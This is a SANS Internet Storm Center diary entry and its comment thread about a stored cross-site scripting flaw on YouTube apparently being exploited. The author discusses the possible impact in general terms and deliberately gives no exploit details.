Threat Level: green Handler on Duty: Xavier Mertens

SANS ISC: Stored XSS vulnerability on YouTube actively abused? - Internet Security | DShield SANS ISC InfoSec Forums


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!
Stored XSS vulnerability on YouTube actively abused?

XSS vulnerabilities are often underestimated, but they can sometimes be extremely dangerous. It looks as if couple of hours ago attackers started exploiting what looks like a stored XSS vulnerability on YouTube.

I don't want to go into details on how to exploit it until YouTube fixes it, but it indeed looks pretty widespread already. So far, all exploits I've seen just enter some benign HTML and are more of comment spam, but as this appears to be a full-fledged vulnerability things could get out of control easily unless this is fixed.

What could an attacker do? Well, they could steal your YouTube cookies, which probably doesn't mean much to them, but they could also post various JavaScript code that will execute in your browser, in the context of YouTube. I've seen nasty XSS attacks that are used to fake whole login screens and we know how many people use same passwords for multiple accounts.

We'll keep you informed on the development of this.

--
Bojan
INFIGO IS

I will be teaching next: Web App Penetration Testing and Ethical Hacking - SANS Prague August 2019

Bojan

380 Posts
ISC Handler
How will this impact users who use their Google accounts to login to YouTube? Sure, your YouTube cookies don't mean an awful lot but I'd assume the Google Accounts (being linked to gmail addresses) are a more valuable target? Or would these cookies not be sufficient enough to compromise an account?
Anonymous
There is no impact to Google accounts. If you steal YouTube cookies you won't be able to access any other Google hosted stuff since it's in a different domain and the SSO system in place relies on the main google.com domain.
Bojan

380 Posts
ISC Handler
Many people have their credentials in their browser. XSS can extract those easily.
Bojan
27 Posts
Now that the vurnability has been patched, could you go into more detail about it?
Bojan
2 Posts
I also wanna know in detail about XSS attack code.
drwx

1 Posts
Guess this proves what Microsoft has showed us the last years; errors are human and will always exist.. Holistic web-security should include web-filters that verifies the content before they are handled by the app.servers...
drwx
3 Posts
The update and explanation given here is quite good. There is another article technical describing details of this attack: http://tinyurl.com/36j8wdh
drwx
1 Posts

Sign Up for Free or Log In to start participating in the conversation!